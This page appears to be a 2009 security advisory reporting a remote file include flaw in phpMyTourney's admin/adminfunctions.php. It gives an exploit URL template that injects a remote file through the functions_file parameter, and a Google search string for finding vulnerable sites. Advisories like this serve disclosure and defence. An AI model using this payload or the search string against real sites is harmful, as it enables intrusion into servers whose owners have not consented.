phpMyTourney adminfunctions.php Remote File Include Vulnerabilities

2009.06.17
Credit: IrIsT
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

...a bug in phpMyTourney that allows to us to occur a Remote File Include on a Remote machin. Bug : # # # Islamic Republic Of Iran Security Team # # # # Www.IrIsT.Ir # # # # # # phpMyTourney adminfunctions.php Remote File Include Vulnerabilities # # # # Download......: http:/phpmytourney.sourceforge.net # # # # file; # # dminfunctions.php # # # # bug; # # # # include($functions_file); # # # # Exploit...: http://[site]/[path]/admin/adminfunctions.php?functions_file=[Site]? # # # # Bug Found.....: IrIsT # # # # discovery.....: Am!r (IrIsT) # # # # contact.......: IrIsT.Ir[at]Gmail.Com # # # # Google Search.: "Powered By phpMyTourney" # # #

References:

http://seclists.org/bugtraq/2009/Jun/0176.html


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top